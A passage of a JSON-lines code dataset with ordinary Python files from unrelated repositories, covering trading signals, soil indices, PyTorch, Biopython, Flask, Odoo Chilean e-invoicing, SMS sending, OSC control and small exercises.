data):\n self.data = np.array(data)\n self.bars = data.index\n self.short = 20\n self.long = 50\n self.signals = self._generate_signals()\n \n \n def _generate_signals(self):\n '''This is truly the most important part.\n This piece will change everytime we want \n to test a different strategy\n '''\n # Create DataFrame and initialise signal series to zero\n signals = pd.DataFrame(index=self.bars)\n signals['signal'] = 0\n \n # Create the short/long simple moving averages\n signals['short_mavg'] = ta.SMA(self.data, self.short)\n signals['long_mavg'] = ta.SMA(self.data, self.long)\n \n # When the short SMA exceeds the long SMA, set the ‘signals’ Series to 1 (else 0)\n signals['signal'][self.short:] = \\\n np.where(signals['short_mavg'][self.short:] > \\\n signals['long_mavg'][self.short:], 1, 0)\n \n # Take the difference of the signals in order to generate actual trading orders\n signals['order'] = signals['signal'].diff()\n return signals","repo_name":"jsaperas/market_analysis","sub_path":"Backtesting/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24285443142","text":"import os\nimport pandas as pd\nimport geopandas as gpd\n\n\n# only favorable soils are used (first 3 values) - no\n# table provided to separete one from another, but there is column in csv where\n# this can be specified (1=unfavorable) and values from columns 4-6 will be\n# taken in calculation also.\nletters = {\n 'A': [1, 0.96, 0.89, 1., 0.94, 0.79], # 0-2%\n 'B': [0.99, 0.95, 0.88, .99, .93, .78], # 2-4\n 'C': [0.97, 0.93, 0.86, .96, .90, .74], # 4-7\n 'D': [0.93, 0.89, 0.81, .91, .83, .69], # 7-12\n 'E': [0.87, 0.82, 0.75, .85, .78, .63], # 12-18\n 'F': [0.71, 0.66, 0.59, .68, .62, .47], # 18-35\n 'G': [0.52, 0.48, 0.40, .49, .43, .28], # 35-43\n 'H': [0.48, 0.44, 0.36, .45, .39, .24], # >43\n}\npth_fl = os.path.dirname(__file__)\npth_sr = os.path.join(pth_fl, '..', 'data', 'soil_ratings.csv')\n\n# this file contains 2 columns with values, one returns values equal to this\n# from book, others from written example on coda.io\n# all soils are marked as favorable as no source was specified to get proper\n# values\n# originating from this site:\n# https://www.nrcs.usda.gov/publications/University%20of%20Illinois%20Base%20Yield%20Indices%20%28for%20use%20in%20IL%20only%29%20-Query%20By%20Soil%20Survey%20Area.html#reportref # noqa\ndv = pd.read_csv(pth_sr)\n\n\ndef calculate_pi_val(code: str) -> int:\n if code not in dv.musym.values:\n return None\n slope_code = ''\n soil_code = ''\n letter = ''\n for li in letters.keys():\n if li in code:\n soil_code = code.split(li)[0]\n slope_code = code.split(li)[-1]\n slope_code = slope_code if slope_code in ['3', '2'] else ''\n letter = li\n\n if soil_code == '':\n slope_code = ''\n letter = 'A'\n # there are some other caps letters in soil names\n # like L but script will treat it as A\n\n val = dv[dv.musym == code].loc[:, 'value'].values[0]\n fav = dv[dv.musym == code].loc[:, 'unfavorable'].values[0]\n # this will use unfavorable columns [3:6] from letters\n fav = fav if fav == 0 else 3\n ind = 0\n if slope_code == '2':\n ind = 1\n elif slope_code == '3':\n ind = 2\n\n return round(val * letters[letter][int(ind+fav)])\n\n\ndef process_pi(pth: str) -> pd.DataFrame:\n df = gpd.read_file(pth, layer='mapunit', ignore_geometry=True)\n\n df.loc[:, 'pi'] = df.apply(lambda xx: calculate_pi_val(xx.musym), axis=1)\n return df[['mukey', 'pi']]\n\n\nif __name__ == '__main__':\n process_pi('/Users/pawel/freelance/ssurgo/gSSURGO_IL.gdb')\n","repo_name":"pawelkdevbase/ssurgo_db","sub_path":"soil_scripts/pi_calc.py","file_name":"pi_calc.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2776875646","text":"# coding=utf-8\n# user=hu\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport string\n\nall_characters = string.printable\nn_characters = len(all_characters)\n\n\n\n\n\n\ndef char_tensor(string):\n tensor = torch.zeros(len(string)).long()\n for c in range(len(string)):\n tensor[c] = ord(string[c])\n return Variable(tensor)\n\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n # 1 input image channel, 6 output channels, 5x5 square convolution\n # kernel\n self.conv1 = nn.Conv2d(1, 6, 5)\n self.conv2 = nn.Conv2d(6, 16, 5)\n # an affine operation: y = Wx + b\n self.fc1 = nn.Linear(16 * 5 * 5, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n def forward(self, x):\n # Max pooling over a(2, 2) window\n x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))\n # If the size is a square you can only specify a single number\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\ndef torch_y():\n tensor = torch.FloatTensor([[1, 2], [3, 4]])\n variable = Variable(tensor, requires_grad=True)\n print(tensor)\n print(variable)\n print(variable.data)\n t_out = torch.mean(tensor*tensor)\n v_out = torch.mean(variable*variable)\n print(t_out)\n print(v_out)\n print(variable.data.numpy())\n\n\nif __name__ == '__main__':\n print(char_tensor('123abc!!!胡阳杰'))\n # print(ord('胡'))\n # print(chr(2))\n","repo_name":"hyjalxl/yihuo","sub_path":"pytorch_yi/torch_test1.py","file_name":"torch_test1.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34786996189","text":"#!/usr/bin/env python\n\nfrom Bio import SeqIO\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.Seq import Seq\nimport re \nimport time\n\n\n### defaults\nDROSOPHILA_GENOME_FILE = \"genome/dmel-all-chromosome-r6.fasta\"\nDEFAULT_FORMAT = \"fasta\"\nKMER_SIZE = 6\nOUTFILE_KMER = \"unique_kmers.fasta\"\n\n\ndef read_sequences(file=DROSOPHILA_GENOME_FILE,format=DEFAULT_FORMAT):\n '''\n Reads the genome file in given format\n params\n file: path to file, default= DROSOPHILA_GENOME_FILE\n format: format of the file, default= FASTA\n '''\n unique_kmers = set()\n try:\n with open(OUTFILE_KMER,\"w\"):\n for seq_record in SeqIO.parse(file,format):\n if re.match(r\"^\\d{1,1}\\D*$\", seq_record.id):\n for kmer in _sliding_window(seq_record.seq,KMER_SIZE):\n unique_kmers.add(kmer)\n\n ## write the unique kmers to file in fasta\n write_unique_seq(unique_kmers) \n\n except FileNotFoundError as e:\n print(\"Please make sure path to the file is correct. \\n{0}\".format(e))\n\n except Exception as e:\n print(\"Error while find kmers : {0}\".format(e))\n\n\n\n\ndef write_unique_seq(unique_kmers):\n sequences = list()\n counter = 0\n for s in unique_kmers:\n counter += 1\n sequences.append(SeqRecord(Seq(s),id=\"id_\"+str(counter),description=\"Desc: kmer_\"+str(counter)))\n \n SeqIO.write(sequences,OUTFILE_KMER,DEFAULT_FORMAT)\n \n print(\"unique k-mers writen to file: {0}\".format(OUTFILE_KMER))\n print(\"Total unique k-mers found: {0}\".format(counter))\n\n\n\ndef _sliding_window(seq,window_size):\n '''\n print the k-mers of size window_size \n params:\n seq: seq string \n window_size: size of the k-mer \n rtype: array of k-mers\n '''\n start = 0\n end = len(seq) - window_size + 1\n print(\"length of the chromosome seq : {0}\".format(len(seq)))\n for pos in range(start,end):\n yield str(seq[pos:pos+window_size])\n\n\n\nif __name__==\"__main__\":\n start = time.time()\n read_sequences()\n end = time.time()\n print(\"Total Time for for execution : {0} secs.\".format(end-start))\n\n","repo_name":"sohailchd/bioinformaticsMethods","sub_path":"BioPython/bp_kmers.py","file_name":"bp_kmers.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10484782816","text":"import datetime\n\nfrom flask_script import Command, Option\n\nfrom app import db\nfrom app.resources.news.models import NewsItem\n\n\nclass ParseNewsDesc(Command):\n \"\"\"\n Command to remove old feed items\n\n :arg verbose:\n print progress\n :arg dry:\n dry run\n \"\"\"\n\n option_list = [\n Option('--verbose', '-v', dest='verbose', action='store_true',\n default=False),\n Option('--dry', '-dry', dest='dry', action='store_true',\n default=False),\n ]\n\n def run(self, verbose, dry):\n if verbose:\n print('---' + str(datetime.datetime.utcnow()) + '---')\n print('Removing old feed entries...')\n\n try:\n items = NewsItem.query.order_by(NewsItem.row_id)\n print('records to process {}'.format(items.count()))\n start = 0\n batch = 1000\n while True:\n news_batch = items.offset(start).limit(batch).all()\n if not news_batch:\n break\n for item in news_batch:\n item.parse_description()\n db.session.add(item)\n db.session.commit()\n start += batch\n print('processed {} items'.format(start))\n except Exception as e:\n db.session.rollback()\n print(e)\n exit(1)\n\n print('---' + str(datetime.datetime.utcnow()) + '---')\n print('Done')","repo_name":"Witzcode0/Exchange-connect","sub_path":"commands/newsfeed/parse_news_desc.py","file_name":"parse_news_desc.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39118651903","text":"from typing import List\n\nfrom nucleus.prediction import PredictionList\n\nfrom .custom_types import BoxOrPolygonAnnoOrPred\nfrom .polygon_utils import polygon_annotation_to_shape\n\n\ndef polygon_area_filter(\n polygons: List[BoxOrPolygonAnnoOrPred], min_area: float, max_area: float\n) -> List[BoxOrPolygonAnnoOrPred]:\n filter_fn = (\n lambda polygon: min_area\n <= polygon_annotation_to_shape(polygon)\n <= max_area\n )\n return list(filter(filter_fn, polygons))\n\n\ndef confidence_filter(\n predictions: PredictionList, min_confidence: float\n) -> PredictionList:\n predictions_copy = PredictionList()\n filter_fn = (\n lambda prediction: not hasattr(prediction, \"confidence\")\n or prediction.confidence >= min_confidence\n )\n for attr in predictions.__dict__:\n predictions_copy.__dict__[attr] = list(\n filter(filter_fn, predictions.__dict__[attr])\n )\n return predictions_copy\n\n\ndef polygon_label_filter(\n polygons: List[BoxOrPolygonAnnoOrPred], label: str\n) -> List[BoxOrPolygonAnnoOrPred]:\n return list(filter(lambda polygon: polygon.label == label, polygons))\n","repo_name":"scaleapi/nucleus-python-client","sub_path":"nucleus/metrics/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"81"} +{"seq_id":"6002460111","text":"from __future__ import print_function\nimport torch\nimport numpy as np\nfrom PIL import Image\nimport os\nimport cv2\n\n\ndef get_surface_normals(depth, k):\n \"\"\"\n Estimates surface normals from depth data\n :param depth: 2D depth map (h,w)\n :param k: 3x3 camera intrinsic matrix\n :return: 3D estimation of surface normals (3, h-2, w-2)\n \"\"\"\n height, width = depth.shape\n\n def normalization(data):\n \"\"\"\n Applies normalization via Euclidean norm\n :param data: Input array\n :return: Normalized input array\n \"\"\"\n norm = np.sqrt(\n np.multiply(data[:, :, 0], data[:, :, 0])\n + np.multiply(data[:, :, 1], data[:, :, 1])\n + np.multiply(data[:, :, 2], data[:, :, 2])\n )\n norm = np.dstack((norm, norm, norm))\n return data / norm\n\n x, y = np.meshgrid(np.arange(0, width), np.arange(0, height)) # 2D to 3D conversion\n x = x.reshape([-1])\n y = y.reshape([-1])\n xyz = np.vstack((x, y, np.ones_like(x)))\n pts_3d = np.dot(np.linalg.inv(k), xyz * depth.reshape([-1]))\n pts_3d_world = pts_3d.reshape((3, height, width))\n f = pts_3d_world[:, 1: height - 1, 2:width] - pts_3d_world[:, 1: height - 1, 1: width - 1] # compute x and y diff\n t = pts_3d_world[:, 2:height, 1: width - 1] - pts_3d_world[:, 1: height - 1, 1: width - 1]\n normal_map = np.cross(f, t, axisa=0, axisb=0) # cross product and norm\n normal_map = normalization(normal_map)\n\n return normal_map.astype(np.float32)\n\n\ndef save_images(save_dir, visuals, image_name, image_size, prob_map):\n \"\"\"\n Creates visualizations of the prediction and saves it as an image\n :param save_dir: Save directory\n :param visuals: 'visuals' dict from the model\n :param image_name: Name of the image to be saved\n :param image_size: Size of the image (h, w)\n :param prob_map: TestOptions prob_map flag\n \"\"\"\n image_name = image_name[0]\n orig_size = (image_size[0].item(), image_size[1].item())\n image_palette = list(\n np.genfromtxt('datasets/palette.txt', dtype=np.uint8).reshape(3 * 256)) # load palette for binary prediction\n\n for label, im_data in visuals.items():\n if label == 'output':\n if prob_map:\n im = tensor_to_confidence_map(im_data)\n im = cv2.resize(im, orig_size)\n cv2.imwrite(os.path.join(save_dir, image_name + \".jpg\"), im)\n else:\n im = tensor_to_label_image(im_data, image_palette)\n im = cv2.resize(im, orig_size)\n cv2.imwrite(os.path.join(save_dir, image_name + \".jpg\"), cv2.cvtColor(im, cv2.COLOR_RGB2BGR))\n\n\ndef tensor_to_image(input_image, image_type=np.uint8):\n \"\"\"\n Converts tensor to image\n :param input_image: Tensor containing image data\n :param image_type: Data type of image\n :return: Converted image as numpy array\n \"\"\"\n if isinstance(input_image, torch.Tensor):\n image_tensor = input_image.data\n else:\n return input_image\n image_numpy = image_tensor[0].cpu().float().numpy()\n if image_numpy.shape[0] == 1: # greyscale to rgb (channel is duplicated)\n image_numpy = np.tile(image_numpy, (3, 1, 1))\n image_numpy = (np.transpose(image_numpy, (1, 2, 0))) * 255 # CHW to HWC, * 255 for visual\n return image_numpy.astype(image_type)\n\n\ndef tensor_to_label_image(label_tensor, image_palette, image_type=np.uint8):\n \"\"\"\n Converts tensor to label image (binary prediction)\n :param label_tensor: Input tensor\n :param image_palette: Color palette for the image\n :param image_type: Data type of image\n :return: Converted image as numpy array\n \"\"\"\n if len(label_tensor.shape) == 4: # if NCHW, take max scores on C\n _, label_tensor = torch.max(label_tensor.data.cpu(), 1)\n\n label_numpy = label_tensor[0].cpu().float().detach().numpy()\n label_image = Image.fromarray(label_numpy.astype(np.uint8))\n label_image = label_image.convert(\"P\")\n label_image.putpalette(image_palette)\n label_image = label_image.convert(\"RGB\")\n return np.array(label_image).astype(image_type)\n\n\ndef tensor_to_confidence_map(label_tensor, image_type=np.uint8):\n \"\"\"\n Converts tensor to confidence (probability) map\n :param label_tensor: Input tensor\n :param image_type: Data type of image\n :return: Converted image as numpy array\n \"\"\"\n softmax_numpy = label_tensor[0].cpu().float().detach().numpy()\n softmax_numpy = np.exp(softmax_numpy) # apply softmax to obtain probabilities\n label_image = np.true_divide(softmax_numpy[1], softmax_numpy[0] + softmax_numpy[1])\n label_image = np.floor(255 * (label_image - label_image.min()) / (\n label_image.max() - label_image.min())) # normalize, * 255 for visual\n return np.array(label_image).astype(image_type)\n\n\ndef confidence_map_to_overlay(rgb, conf_map):\n \"\"\"\n Applies a green tint overlay to the RGB image, based on the confidence map\n :param rgb: Input RGB image\n :param conf_map: Input confidence map\n :return: Input RGB image with the green overlay\n \"\"\"\n conf_map = conf_map / 255\n rgb[:, :, 0] = rgb[:, :, 0] * (1 - conf_map)\n rgb[:, :, 2] = rgb[:, :, 2] * (1 - conf_map)\n return rgb\n\n\ndef print_current_losses(epoch, i, losses, t_iter, t_data):\n \"\"\"\n Prints information related to the current losses\n :param epoch: Current epoch number\n :param i: Current iteration number\n :param losses: Dict containing the losses\n :param t_iter: Total time taken for current iteration\n :param t_data: Total time taken for current data processing\n \"\"\"\n message = '(Epoch: %d, Iters: %d, Time: %.3f, Data: %.3f) ' % (epoch, i, t_iter, t_data)\n for k, v in losses.items():\n message += '%s: %.3f ' % (k, v)\n print(message)\n\n\ndef mkdirs(paths):\n \"\"\"\n Creates directories\n :param paths: A string or a list of strings representing the path(s) to be created\n \"\"\"\n if isinstance(paths, list):\n for path in paths:\n if not os.path.exists(path):\n os.makedirs(path)\n elif isinstance(paths, str):\n if not os.path.exists(paths):\n os.makedirs(paths)\n\n\ndef get_confusion_matrix(x, y, n, ignore_label=None, mask=None):\n \"\"\"\n Computes a confusion matrix of n classes\n :param x: True labels\n :param y: Predicted labels\n :param n: Number of classes\n :param ignore_label: Optional label to be ignored\n :param mask: Optional mask to exclude certain labels\n :return: 2D confusion matrix (n, n)\n \"\"\"\n if mask is None: # if None, set mask to include all labels\n mask = np.ones_like(x) == 1\n k = (x >= 0) & (y < n) & (x != ignore_label) & (mask.astype(np.bool)) # create binary mask using the inputs\n # np.bincount's parameter can be seen as a 'shifting' of the labels into their respective cells from the matrix\n # Apply np.bincount and reshape to obtain the effective counts and the 2D form\n return np.bincount(n * x[k].astype(int) + y[k], minlength=n ** 2).reshape(n, n)\n\n\ndef get_metrics(conf_matrix):\n \"\"\"\n Computes metrics based on the confusion matrix\n :param conf_matrix: 2D confusion matrix\n :return: Accuracy, precision, recall, F1-score, IoU as floats\n \"\"\"\n if conf_matrix.sum() == 0: # Zero entries in the matrix => zero valued metrics\n return 0, 0, 0, 0, 0\n with np.errstate(divide='ignore', invalid='ignore'):\n accuracy = np.diag(conf_matrix).sum() / np.float(conf_matrix.sum())\n class_precision = np.diag(conf_matrix) / conf_matrix.sum(0).astype(np.float)\n class_recall = np.diag(conf_matrix) / conf_matrix.sum(1).astype(np.float)\n iou = np.diag(conf_matrix) / (conf_matrix.sum(1) + conf_matrix.sum(0) - np.diag(conf_matrix)).astype(np.float)\n precision = class_precision[1]\n recall = class_recall[1]\n f_score = 2 * (recall * precision) / (recall + precision)\n return accuracy, precision, recall, f_score, iou[1]\n","repo_name":"RobertCojocariu9/FSEstimation","sub_path":"util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":7978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15060004927","text":"# -*- coding: utf-8 -*-\r\nimport logging\r\n\r\nimport top.api\r\nimport syl\r\n\r\n\r\ndef send_vcode(to_phone, username, vcode):\r\n logger = logging.getLogger(__name__)\r\n url = 'gw.api.taobao.com'\r\n port = 80\r\n req = top.api.AlibabaAliqinFcSmsNumSendRequest(url, port)\r\n req.set_app_info(top.appinfo(syl.settings.SMS['appkey'], syl.settings.SMS['secret']))\r\n \r\n req.extend = \"123456\"\r\n req.sms_type = \"normal\"\r\n req.sms_param = \"{\\\"vcode\\\":\\\"\" + str(vcode) + \"\\\",\\\"username\\\":\\\"\" + username.replace(',', ' ').encode('utf-8') + \"\\\"}\"\r\n req.rec_num = to_phone.encode('utf-8')\r\n req.sms_template_code = syl.settings.SMS['sms_template_code']\r\n req.sms_free_sign_name = \"四月儿\"\r\n \r\n try:\r\n resp = req.getResponse()\r\n logger.info(resp)\r\n return True\r\n except Exception as e:\r\n logger.error(e)\r\n return False\r\n","repo_name":"llv8/syl","sub_path":"cust/send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14222658860","text":"from pythonosc import dispatcher\nfrom pythonosc import osc_server\nimport microphone_server\n\nTOGGLE_PERFORMANCE = False\n\ndef rb1(*args):\n global TOGGLE_PERFORMANCE\n val = args[-1]\n if val == 1.0 and TOGGLE_PERFORMANCE is not True:\n print(\"Starting performance\")\n microphone_server.run()\n\ndef s1(*args):\n val = args[-1]\n print(val)\n\n\ndispatcher = dispatcher.Dispatcher()\ndispatcher.map(\"/rb1\", rb1 )\ndispatcher.map(\"/s1\", s1 )\n\nserver = osc_server.ThreadingOSCUDPServer((\"localhost\", 7406), dispatcher)\nprint(\"Serving on {}\".format(server.server_address))\nprint(\"Press rb1 to the performance:\".format(server.server_address))\n\nserver.serve_forever()\n","repo_name":"samhains/lipp_performance_3","sub_path":"python/osc_server.py","file_name":"osc_server.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72150321864","text":"import base64\nfrom html import unescape\n\nfrom lxml import etree\nfrom odoo import models, api, _, fields\nfrom odoo.exceptions import UserError\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n\n departure_address = fields.Char(\"Departure Address\")\n departure_city = fields.Char(\"Departure City\")\n departure_state = fields.Char(\"Departure State\")\n\n @api.onchange('partner_id')\n def _onchange_partner_id(self):\n config = self.env['fiscal.dte.printing.config'].search([('company_id', '=', self.company_id.id)])\n if not config:\n raise UserError(_(\"Configuration for DTE Printing Format Not Found, Company: %s \" % self.company_id.name))\n if config and self.move_type in self.get_invoice_types() and self.journal_id.type == 'sale':\n if self.partner_id and self.partner_id.l10n_cl_sii_taxpayer_type == '3':\n self.l10n_latam_document_type_id = config.voucher_document_type.id\n\n def _is_doc_type_voucher(self):\n res = False\n if self.l10n_latam_document_type_id.code in ['35', '39', '906', '45', '46', '70', '71']:\n res = True\n for ref_rec in self.l10n_cl_reference_ids:\n found = False\n if ref_rec.l10n_cl_reference_doc_type_selection == '39' and not found:\n res = True\n found = True\n if ref_rec.l10n_cl_reference_doc_type_selection == '61' and not found:\n origin_doc = self.env['account.move'].search([]).filtered(\n lambda inv: inv.l10n_latam_document_number == ref_rec.origin_doc_number)\n for ref_orig_rec in origin_doc:\n if ref_orig_rec and ref_orig_rec.l10n_latam_document_type_id.code == '39' and not found:\n res = True\n found = True\n return res\n\n # CCU REDEFINED\n\n def _l10n_cl_create_dte(self):\n if self._is_doc_type_voucher():\n self._ccu_l10n_cl_create_dte()\n else:\n super(AccountMove, self)._l10n_cl_create_dte()\n\n def _l10n_cl_create_dte_envelope(self, receiver_rut='60803000-K'):\n if self._is_doc_type_voucher():\n dte_signed, file_name = self._ccu_l10n_cl_create_dte_envelope(receiver_rut)\n else:\n dte_signed, file_name = super(AccountMove, self)._l10n_cl_create_dte_envelope(receiver_rut)\n return dte_signed, file_name\n\n def l10n_cl_send_dte_to_sii(self, retry_send=True):\n if self._is_doc_type_voucher():\n self.ccu_l10n_cl_send_dte_to_sii(retry_send)\n else:\n super(AccountMove, self).l10n_cl_send_dte_to_sii(retry_send)\n\n # CCU METHODS\n def _ccu_l10n_cl_create_dte(self):\n folio = int(self.l10n_latam_document_number)\n doc_id_number = 'B{}T{}'.format(folio, self.l10n_latam_document_type_id.code)\n dte_barcode_xml = self._l10n_cl_get_dte_barcode_xml()\n self.l10n_cl_sii_barcode = dte_barcode_xml['barcode']\n dte = self.env.ref('l10n_cl_edi.dte_template')._render({\n 'move': self,\n 'format_vat': self._l10n_cl_format_vat,\n 'get_cl_current_strftime': self._get_cl_current_strftime,\n 'format_length': self._format_length,\n 'doc_id': doc_id_number,\n 'caf': self.l10n_latam_document_type_id._get_caf_file(self.company_id.id,\n int(self.l10n_latam_document_number)),\n 'amounts': self._l10n_cl_get_amounts(),\n 'withholdings': self._l10n_cl_get_withholdings(),\n 'dte': dte_barcode_xml['ted'],\n })\n dte = unescape(dte.decode('utf-8')).replace(r'&', '&')\n digital_signature = self.company_id._get_digital_signature(user_id=self.env.user.id)\n signed_dte = self._sign_full_xml(\n dte, digital_signature, doc_id_number, 'doc', self.l10n_latam_document_type_id._is_doc_type_voucher())\n dte_attachment = self.env['ir.attachment'].create({\n 'name': 'DTE_{}.xml'.format(self.name),\n 'res_model': self._name,\n 'res_id': self.id,\n 'type': 'binary',\n 'datas': base64.b64encode(signed_dte.encode('ISO-8859-1'))\n })\n self.l10n_cl_dte_file = dte_attachment.id\n\n def _ccu_l10n_cl_create_dte_envelope(self, receiver_rut='60803000-K'):\n file_name = 'B{}T{}.xml'.format(self.l10n_latam_document_number, self.l10n_latam_document_type_id.code)\n digital_signature = self.company_id._get_digital_signature(user_id=self.env.user.id)\n template = self.l10n_latam_document_type_id._is_doc_type_voucher() and self.env.ref(\n 'l10n_cl_edi.envio_boleta') or self.env.ref('l10n_cl_edi.envio_dte')\n dte_rendered = template._render({\n 'move': self,\n 'RutEmisor': self._l10n_cl_format_vat(self.company_id.vat),\n 'RutEnvia': digital_signature.subject_serial_number,\n 'RutReceptor': receiver_rut,\n 'FchResol': self.company_id.l10n_cl_dte_resolution_date,\n 'NroResol': self.company_id.l10n_cl_dte_resolution_number,\n 'TmstFirmaEnv': self._get_cl_current_strftime(),\n 'dte': base64.b64decode(self.l10n_cl_dte_file.datas).decode('ISO-8859-1')\n })\n dte_rendered = unescape(dte_rendered.decode('utf-8')).replace('',\n '')\n dte_signed = self._sign_full_xml(\n dte_rendered, digital_signature, 'SetDoc',\n self.l10n_latam_document_type_id._is_doc_type_voucher() and 'bol' or 'env',\n self.l10n_latam_document_type_id._is_doc_type_voucher()\n )\n return dte_signed, file_name\n\n def ccu_l10n_cl_send_dte_to_sii(self, retry_send=True):\n \"\"\"\n Send the DTE to the SII. It will be\n \"\"\"\n # INVOICE SERVER\n if self.company_id.l10n_cl_dte_voucher_service_provider == self.company_id.INVOICE_SERVER:\n digital_signature = self.company_id._get_digital_signature(user_id=self.env.user.id)\n response = self._send_xml_to_sii(\n self.company_id.l10n_cl_dte_service_provider,\n self.company_id.website,\n self.company_id.vat,\n self.l10n_cl_sii_send_file.name,\n base64.b64decode(self.l10n_cl_sii_send_file.datas),\n digital_signature\n )\n if not response:\n return None\n\n response_parsed = etree.fromstring(response)\n self.l10n_cl_sii_send_ident = response_parsed.findtext('TRACKID')\n sii_response_status = response_parsed.findtext('STATUS')\n if sii_response_status == '5':\n digital_signature.last_token = False\n _logger.error('The response status is %s. Clearing the token.' %\n self._l10n_cl_get_sii_reception_status_message(sii_response_status))\n if retry_send:\n _logger.info('Retrying send DTE to SII')\n self.l10n_cl_send_dte_to_sii(retry_send=False)\n\n # cleans the token and keeps the l10n_cl_dte_status until new attempt to connect\n # would like to resend from here, because we cannot wait till tomorrow to attempt\n # a new send\n else:\n self.l10n_cl_dte_status = 'ask_for_status' if sii_response_status == '0' else 'rejected'\n self.message_post(\n body=_('DTE has been sent to SII with response: %s.') % self._l10n_cl_get_sii_reception_status_message(\n sii_response_status))\n if self.company_id.l10n_cl_dte_voucher_service_provider == self.company_id.VOUCHER_SERVER:\n digital_signature = self.company_id._get_digital_signature(user_id=self.env.user.id)\n response = self._ccu_send_xml_to_sii(\n self.company_id.l10n_cl_dte_service_provider,\n self.company_id.website,\n self.company_id.vat,\n self.l10n_cl_sii_send_file.name,\n base64.b64decode(self.l10n_cl_sii_send_file.datas),\n digital_signature\n )\n if not response:\n return None\n\n response_parsed = etree.fromstring(response)\n self.l10n_cl_sii_send_ident = response_parsed.findtext('TRACKID')\n sii_response_status = response_parsed.findtext('STATUS')\n if sii_response_status == '5':\n digital_signature.last_token = False\n _logger.error('The response status is %s. Clearing the token.' %\n self._l10n_cl_get_sii_reception_status_message(sii_response_status))\n if retry_send:\n _logger.info('Retrying send DTE to SII')\n self.l10n_cl_send_dte_to_sii(retry_send=False)\n\n # cleans the token and keeps the l10n_cl_dte_status until new attempt to connect\n # would like to resend from here, because we cannot wait till tomorrow to attempt\n # a new send\n else:\n self.l10n_cl_dte_status = 'ask_for_status' if sii_response_status == '0' else 'rejected'\n self.message_post(\n body=_('DTE has been sent to SII with response: %s.') % self._l10n_cl_get_sii_reception_status_message(\n sii_response_status))\n\n","repo_name":"marcobustamanteab/odoo-pos","sub_path":"src/custom-addons/ccu_l10n_cl_edi/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":9569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5141087224","text":"import inflect\np = inflect.engine()\nimport sys\n\nlist = []\nwhile True:\n try:\n name = input(\"Name:\")\n if len(name) == 0:\n sys.exit()\n list.append(name)\n except EOFError:\n print(\"Adieu, adieu, to \" + p.join(list))\n break\n else:\n continue\n","repo_name":"dorabz/CS50-s-Introduction-to-Programming-with-Python","sub_path":"problem_set_4/adieu/adieu.py","file_name":"adieu.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26730069497","text":"def xor(n):\n xor = n if not n % 2 else 0\n return xor + 1 * int(0 < n % 4 < 3)\n \n\ndef solution(start, length):\n checksum = 0\n n = start\n for i in range(length, 0, -1):\n checksum ^= xor(n+i-1)^xor(n-1)\n n += length\n\n return checksum","repo_name":"korkmaz-arda/google-foobar-2023","sub_path":"level3/queue-to-do/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5370966472","text":"# key_rules_fc.py\n\nfrom __future__ import with_statement\nfrom pyke import contexts, pattern, fc_rule, knowledge_base\n\npyke_version = '1.1.1'\ncompiler_version = 1\n\ndef take(rule, context = None, index = None):\n engine = rule.rule_base.engine\n if context is None: context = contexts.simple_context()\n try:\n with knowledge_base.Gen_once if index == 0 \\\n else engine.lookup('chest', 'closed', context,\n rule.foreach_patterns(0)) \\\n as gen_0:\n for dummy in gen_0:\n with knowledge_base.Gen_once if index == 1 \\\n else engine.lookup('key', 'inChest', context,\n rule.foreach_patterns(1)) \\\n as gen_1:\n for dummy in gen_1:\n engine.assert_('key', 'inChest',\n (rule.pattern(0).as_data(context),)),\n rule.rule_base.num_fc_rules_triggered += 1\n finally:\n context.done()\n\ndef populate(engine):\n This_rule_base = engine.get_create('key_rules')\n \n fc_rule.fc_rule('take', This_rule_base, take,\n (('chest', 'closed',\n (pattern.pattern_literal(False),),\n False),\n ('key', 'inChest',\n (pattern.pattern_literal(True),),\n False),),\n (pattern.pattern_literal(False),))\n\n\nKrb_filename = '../KB/key_rules.krb'\nKrb_lineno_map = (\n ((13, 17), (5, 5)),\n ((18, 22), (6, 6)),\n ((23, 24), (8, 